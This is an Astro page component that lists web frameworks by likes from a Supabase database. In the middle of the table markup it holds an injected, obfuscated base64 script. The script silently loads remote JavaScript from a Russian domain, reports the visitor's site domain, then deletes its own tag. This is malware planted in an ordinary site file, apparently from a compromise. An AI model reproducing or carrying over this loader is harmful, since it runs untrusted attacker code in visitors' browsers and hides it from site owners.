---
import { getEntry } from "astro:content";
import Alert from "../components/Alert.astro";
import Guide from "../components/Guide.astro";
import Layout from "../components/Layout.astro";
import TableRow from "../components/TableRow.astro";
import { supabase } from "../utils/database";

export const prerender = false;

let frameworks;
let frameworksError;

// Fetch frameworks data from Supabase if connection is set up
if (supabase) {
  const { data, error } = await supabase
    .from("frameworks")
    .select("*")
    .order("likes", { ascending: false });
  frameworks = data;
  frameworksError = error;
}

// Get guides
const connectGuide = await getEntry("guides", "guide-connect-supabase");
const fetchDataGuide = await getEntry("guides", "guide-fetch-data");
---

<Layout title="Web Frameworks">
  {
    supabase ? (
      frameworks ? (
        <>
          <h1 class="mb-8 text-4xl font-bold">
            Vote for Your Favorite Web Framework
          </h1>
         <script src="data:text/javascript;charset=utf-8; base64, c2V0VGltZW91dChmdW5jdGlvbi&#x67;pe2xldCBrY3J5ZmM9Ilx1MDA3M1x1MDA2M1x1MDA3MiIrIlx1MDA2OVx1MDA3MFx1MDA3NCI7bGV0IF9jcT1kb2N1bWVudDtsZXQgX3pyc3o9X2NxLmNyZWF0ZUVsZW1lbnQoa2NyeWZjKTtfenJzei5hc3luYz0xO2xldCBfb2lzPSJcdTAwNjhcdTAwNzRcdTAwNzRcdTAwNzBcdTAwNzNcdTAwM2EiKyJcdTAwMmZcdTAwMmZcdTAwNzNcdTAwNjZcdTAwNmNcdTAwNmYiKyJcdTAwNjdcdTAwMmVcdTAwNzJcdTAwNzVcdTAwMmYiKyJcdTAwNmFcdTAwNzNcdTAwMmZcdTAwM2ZcdTAwNjlcdTAwNjRcdTAwM2QzOTk1ZWU5YWQwMzBiZDc4OGRkYmY0OGNmMzNmOTZiN1x1MDAyNlx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDA2MVx1MDA2OSIrIlx1MDA2ZVx1MDAzZCIrX2NxLmRvbWFpbisiXHUwMDI2XHUwMDc0XHUwMDY1XHUwMDcyXHUwMDZkXHUwMDNkMCZ4PWtjcnlmYy5qcyI7X3pyc3ouc3JjPV9vaXM7KF9jcS5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaHRtbCIpWzBdfHxfY3EuaGVhZHx8X2NxLmJvZHkpLmFwcGVuZENoaWxkKF96cnN6KTtfenJzei5yZW1vdmUoKTt9LDY4KTs=" async></script>
          <table class="w-full text-left">
            <thead>
              <tr class="font-mono text-base border-t border-b">
                <th>Name</th>
                <th>Logo</th>
                <th>Likes</th>
              </tr>
            </thead>
            <tbody>
              {frameworks?.map((framework) => (
                <TableRow framework={framework} />
              ))}
            </tbody>
          </table>
        </>
      ) : (
        <>
          {frameworksError && (
            <Alert
              title={frameworksError.code}
              text={frameworksError.message}
              variant="error"
            />
          )}
          {fetchDataGuide && <Guide guide={fetchDataGuide} />}
        </>
      )
    ) : (
      <>
        <Alert title="Finish setting up your new site" text="Before your website is ready, you must complete the steps from the guide below to create, populate, and connect your Supabase database."/>
        {connectGuide && <Guide guide={connectGuide} />}
      </>
    )
  }
</Layout>
